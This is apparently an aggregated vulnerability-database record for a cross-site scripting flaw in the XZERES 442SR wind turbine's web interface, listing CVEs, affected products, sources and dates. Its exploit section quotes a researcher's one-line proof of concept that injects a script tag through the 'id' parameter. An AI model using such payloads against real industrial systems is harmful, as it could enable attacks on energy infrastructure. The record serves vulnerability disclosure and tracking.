ID
VAR-E-201510-0004
CVE
| cve_id: | CVE-2015-7925 | Trust: 1.4 |
| cve_id: | CVE-2015-7926 | Trust: 0.8 |
| cve_id: | CVE-2015-7929 | Trust: 0.8 |
| cve_id: | CVE-2015-7927 | Trust: 0.8 |
| cve_id: | CVE-2015-7928 | Trust: 0.8 |
| cve_id: | CVE-2015-3970 | Trust: 0.3 |
| cve_id: | CVE-2015-3967 | Trust: 0.3 |
| cve_id: | CVE-2015-3969 | Trust: 0.3 |
| cve_id: | CVE-2015-3968 | Trust: 0.3 |
| cve_id: | CVE-2015-3973 | Trust: 0.3 |
| cve_id: | CVE-2015-3971 | Trust: 0.3 |
| cve_id: | CVE-2015-3972 | Trust: 0.3 |
| cve_id: | CVE-2015-7924 | Trust: 0.3 |
TITLE
XZERES 442SR Wind Turbine XSS
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ewon | model: | sa industrial router | scope: | - | version: | - | Trust: 0.6 |
| vendor: | xzeres | model: | 442sr wind turbine | scope: | - | version: | - | Trust: 0.5 |
| vendor: | ewon | model: | xss csrf session management rbac issues | scope: | eq | version: | /// | Trust: 0.5 |
| vendor: | janitza | model: | umg | scope: | eq | version: | 6050 | Trust: 0.3 |
| vendor: | janitza | model: | umg | scope: | eq | version: | 6040 | Trust: 0.3 |
| vendor: | janitza | model: | umg | scope: | eq | version: | 5110 | Trust: 0.3 |
| vendor: | janitza | model: | umg | scope: | eq | version: | 5090 | Trust: 0.3 |
| vendor: | janitza | model: | umg | scope: | eq | version: | 5080 | Trust: 0.3 |
| vendor: | ewon | model: | ewon | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | ewon | model: | 10.1s0 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability
*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.
The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.
*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01
*Vulnerable parameter*
id
*PoC*
http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter")
</script>
--
Best Regards,
Karn Ganeshen
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Input Validation Error
Trust: 0.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | xss | Trust: 1.0 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-15-342-01 | Trust: 2.2 |
| db: | NVD | id: | CVE-2015-7925 | Trust: 1.4 |
| db: | NVD | id: | CVE-2015-7926 | Trust: 0.8 |
| db: | NVD | id: | CVE-2015-7929 | Trust: 0.8 |
| db: | NVD | id: | CVE-2015-7927 | Trust: 0.8 |
| db: | NVD | id: | CVE-2015-7928 | Trust: 0.8 |
| db: | ICS CERT | id: | ICSA-15-351-03 | Trust: 0.6 |
| db: | EDBNET | id: | 82189 | Trust: 0.6 |
| db: | EDBNET | id: | 82186 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 24788 | Trust: 0.6 |
| db: | EDBNET | id: | 24386 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 135067 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 135069 | Trust: 0.5 |
| db: | ICS CERT | id: | ICSA-15-265-03 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3970 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3967 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3969 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3968 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3973 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3971 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-3972 | Trust: 0.3 |
| db: | BID | id: | 77291 | Trust: 0.3 |
| db: | NVD | id: | CVE-2015-7924 | Trust: 0.3 |
| db: | BID | id: | 79625 | Trust: 0.3 |
REFERENCES
| url: | https://www.intelligentexploit.com | Trust: 1.2 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7925 | Trust: 1.1 |
| url: | https://ics-cert.us-cert.gov/advisories/icsa-15-351-03 | Trust: 0.6 |
| url: | http://ewon.biz | Trust: 0.6 |
| url: | https://0day.today/exploits/24788 | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7928 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7927 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7926 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7929 | Trust: 0.5 |
| url: | https://ics-cert.us-cert.gov/advisories/icsa-15-265-03 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 77291 |
| db: | BID | id: | 79625 |
| db: | PACKETSTORM | id: | 135067 |
| db: | PACKETSTORM | id: | 135069 |
| db: | EDBNET | id: | 82189 |
| db: | EDBNET | id: | 82186 |
| db: | EDBNET | id: | 24386 |
LAST UPDATE DATE
2022-07-27T09:47:19.903000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 77291 | date: | 2015-10-22T00:00:00 |
| db: | BID | id: | 79625 | date: | 2015-12-17T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 77291 | date: | 2015-10-22T00:00:00 |
| db: | BID | id: | 79625 | date: | 2015-12-17T00:00:00 |
| db: | PACKETSTORM | id: | 135067 | date: | 2015-12-24T20:29:23 |
| db: | PACKETSTORM | id: | 135069 | date: | 2015-12-24T20:35:19 |
| db: | EDBNET | id: | 82189 | date: | 2015-12-24T00:00:00 |
| db: | EDBNET | id: | 82186 | date: | 2015-12-24T00:00:00 |
| db: | EDBNET | id: | 24386 | date: | 2015-12-28T00:00:00 |